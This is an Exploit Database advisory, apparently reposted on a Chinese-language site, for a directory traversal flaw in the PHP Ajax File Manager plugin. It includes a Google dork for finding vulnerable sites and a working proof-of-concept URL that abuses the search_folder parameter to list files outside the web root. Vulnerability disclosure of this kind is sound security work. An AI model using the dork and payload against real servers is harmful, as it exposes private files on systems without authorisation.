Ajax File Manager – Directory Traversal

• Exploit Database
• 11 阅读

• 作者： Eduardo Alves
  日期： 2014-03-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/32115/

• # Exploit Title: Ajax File ManagerDirectoryTraversal
  # Google Dork: inurl: "plugins/ajaxfilemanager"
  # Date: 03/07/2014
  # Exploit Author: Eduardo Alves (edudx9)
  # Vendor Homepage: phpletter.com
  # Software Link: http://phpletter.com/Demo/Ajax-File--Manager/
  # Version: [app version - All
  # Tested on: Windows/Linux
  
  
  Ajax File/Image Manager is a l toolto manager files and images remotely.
  Without extra configs, it's possible to list files from another directory.
  
  The vulnerability it's related to "search" function"
  
  In "search_folder" parameter, escape with ../or..%2f
  
  PoF:
  
  http://SERVER/PATH/ajaxfilemanager/ajax_get_file_listing.php?limit=10&view=thumbnail&search=1&search_name=&search_recursively=0&search_mtime_from=&search_mtime_to=&search_folder=../../../../../../../../home/phungv93/public_html/